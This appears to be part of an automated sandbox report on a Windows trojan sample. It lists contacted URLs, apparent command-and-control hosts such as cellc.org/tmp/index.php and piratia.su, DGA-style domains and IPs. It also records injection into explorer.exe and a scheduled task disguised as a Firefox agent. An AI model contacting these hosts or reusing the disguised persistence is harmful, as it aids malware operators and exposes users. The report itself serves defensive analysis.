        https://2no.co/100%Avira URL Cloudmalware
        http://cellc.org:80/tmp/index.phpP0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phpZ0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phpc0%Avira URL Cloudsafe
        http://cellc.org:80/tmp/index.php0%Avira URL Cloudsafe
        http://cellc.org/n0%Avira URL Cloudsafe
        http://khjhprifrxebx.net/0%Avira URL Cloudsafe
        http://ndsmsdugaunva.net/0%Avira URL Cloudsafe
        http://piratia.su/tmp/index.php100%Avira URL Cloudmalware
        http://cellc.org/p0%Avira URL Cloudsafe
        http://cellc.org/s0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phpngsV0%Avira URL Cloudsafe
        http://h-c-v.ru/tmp/index.php100%Avira URL Cloudmalware
        http://ndsmsdugaunva.net/gs0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phpngsA0%Avira URL Cloudsafe
        https://2no.co/16G965100%Avira URL Cloudmalware
        http://jyvmasmiydvgjuu.org/s0%Avira URL Cloudsafe
        http://cellc.org/0%Avira URL Cloudsafe
        http://jyvmasmiydvgjuu.org/0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phprk0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php&jz0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.php/m0%Avira URL Cloudsafe
        http://icebrasilpr.com/tmp/index.php0%Avira URL Cloudsafe
        http://cellc.org/tmp/index.phpngs0%Avira URL Cloudsafe
        http://cellc.org/B0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        2no.co
        104.21.79.229
        truefalse
          unknown
          cellc.org
          186.10.34.243
          truetrue
            unknown
            rgcVXPIqSMzHmoPyVwzhcGh.rgcVXPIqSMzHmoPyVwzhcGh
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://cellc.org/tmp/index.phptrue
              • Avira URL Cloud: safe
              unknown
              http://piratia-life.ru/tmp/index.phpfalse
                high
                http://piratia.su/tmp/index.phptrue
                • Avira URL Cloud: malware
                unknown
                http://h-c-v.ru/tmp/index.phptrue
                • Avira URL Cloud: malware
                unknown
                https://2no.co/16G965false
                • Avira URL Cloud: malware
                unknown
                http://icebrasilpr.com/tmp/index.phptrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://aka.ms/odirmrexplorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Qfile.exefalse
                    high
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://android.notify.windows.com/iOSNexplorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://android.notify.windows.com/iOSEexplorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://excel.office.comexplorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://yyyjoidqibgvbs.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drfalse
                                high
                                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://purl.oenssjhrji, 00000013.00000002.2866115104.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2538497281.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2537510876.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2536709501.0000000003D97000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2535914841.0000000003D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://qkoxdyhgicus.org/explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://uwgftqaxwugurgs.com/explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000011.00000000.2279035434.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://wns.windows.com/explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://android.notify.windows.com/iOSdexplorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://2no.co/16G965uExistence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://wns.windows.com/Lexplorer.exe, 00000011.00000000.2279035434.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://word.office.comexplorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://2no.co/16G965ZExistence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.autoitscript.com/autoit3/Xfile.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679486685.0000000000805000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000002.2288146522.0000000000805000.00000002.00000001.01000000.00000005.sdmp, ssjhrji, 00000013.00000002.2864587716.0000000000BA5000.00000002.00000001.01000000.00000008.sdmp, Spell.0.dr, Existence.pif.1.dr, ssjhrji.17.drfalse
                                                          high
                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                                                              high
                                                              http://schemas.micrexplorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://dgqkmisxnbbni.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://qkoxdyhgicus.org/gsexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://cellc.org/tmp/index.php.iniexplorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://cellc.org/tmp/index.phpcexplorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://outlook.com_explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          low
                                                                          http://cellc.org:80/tmp/index.phpPexplorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://2no.co/Existence.pif, 0000000A.00000003.2226148637.000000000144C000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000003.2226071840.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000002.2229992386.0000000001453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://cellc.org/tmp/index.phpZexplorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.miexplorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://powerpoint.office.comcemberexplorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://khjhprifrxebx.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://ocsps.ssl.com0file.exefalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ndsmsdugaunva.net/explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.microexplorer.exe, 00000011.00000000.2277365932.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2869423152.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.2275324943.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://cellc.org:80/tmp/index.phpexplorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://cellc.org/nexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://cellc.org/pexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://cellc.org/sexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://cellc.org/tmp/index.phpngsVexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.msn.com/qexplorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.ssl.com/repository0file.exefalse
                                                                                          high
                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0file.exefalse
                                                                                                      high
                                                                                                      http://ndsmsdugaunva.net/gsexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://cellc.org/tmp/index.phpngsAexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://cellc.org/tmp/index.phprkexplorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://jyvmasmiydvgjuu.org/explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://jyvmasmiydvgjuu.org/sexplorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://aka.ms/Vh5j3kexplorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://cellc.org/explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crls.ssl.com/ssl.com-rsa-RootCA.crl0file.exefalse
                                                                                                              high
                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://cellc.org/tmp/index.php/mexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://cellc.org/tmp/index.php&jzexplorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api.msn.com/explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://cellc.org/tmp/index.phpngsexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://cellc.org/Bexplorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            104.21.79.229
                                                                                                                            2no.coUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            186.10.34.243
                                                                                                                            cellc.orgChile
                                                                                                                            6471ENTELCHILESACLtrue
                                                                                                                            IP
                                                                                                                            127.0.0.1
                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                            Analysis ID:1435516
                                                                                                                            Start date and time:2024-05-02 20:47:04 +02:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 7m 59s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:file.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winEXE@25/31@6/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 97%
                                                                                                                            • Number of executed functions: 92
                                                                                                                            • Number of non-executed functions: 290
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                            TimeTypeDescription
                                                                                                                            19:49:19Task SchedulerRun new task: Firefox Default Browser Agent D7AD3ECF9BCCA7F1 path: C:\Users\user\AppData\Roaming\ssjhrji
                                                                                                                            20:47:57API Interceptor15x Sleep call for process: Existence.pif modified
                                                                                                                            20:48:55API Interceptor585x Sleep call for process: explorer.exe modified
                                                                                                                            20:49:20API Interceptor1x Sleep call for process: ssjhrji modified
